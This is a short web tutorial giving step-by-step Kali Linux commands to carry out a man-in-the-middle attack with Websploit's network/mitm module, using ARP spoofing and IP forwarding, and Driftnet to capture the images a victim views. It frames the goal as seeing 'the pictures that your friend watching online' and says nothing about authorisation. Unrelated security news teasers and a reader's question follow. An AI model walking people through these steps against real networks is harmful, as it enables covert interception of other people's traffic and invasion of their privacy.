How we can launch a MITM attack with Websploit and the Driftnet – Tool used to capture images.
MITM attack is a type of cyber attack where the attacker intercepts communication between two parties.
Step 1: Need to install websploit in Kali if not present.
root@kali:~# apt-get install websploit
Step2: To Run the websploit
root@kali:~# websploit
Step 3: Next we need to list the modules with the websploit.
wsf > show modules
Step 4: Need to select network/mitm under Network modules.
wsf > use network/mitm
wsf:MITM > show options
Interface: Need to specify the network adapter interface based on our network adapter.
Router: Need to specify Router IP, which can be found with the command route -n.
set Router (Gateway IP)
Target: The victim machine IP address, can be found with ipconfig for Windows and ifconfig for Linux.
Step 5: All set now time to run the sniffer, once you run the sniffer IP Forwarding and ARP Spoofing occur after that sniffers will start up.
wsf:MITM > run
Step 6: Now go down to the victim machine and start surfing, all the images would be captured by drifnet.
Here you can find the pictures that your friend watching online.
If you have any doubt please don’t hesitate to leave a comment.
Cybercriminals are increasingly exploiting search engine optimization (SEO) techniques and paid advertisements to manipulate search…
Cybersecurity experts have unearthed an intricate cyber campaign that leverages deceptive websites posing as the…
Hackers are exploiting what's known as "Dangling DNS" records to take over corporate subdomains, posing…
Security researchers and cybersecurity experts have recently uncovered new variants of the notorious HelloKitty ransomware,…
The RansomHub ransomware group has emerged as a significant danger, targeting a wide array of…
Threat actors are increasingly using email bombing to bypass security protocols and facilitate further malicious…
View Comments
as you mentioned above (Victim machine IP address, can be found with ipconfig for windows and ifconfig for Linux.) for this we need the physical access to the victims machine right? I'm confused here please help me!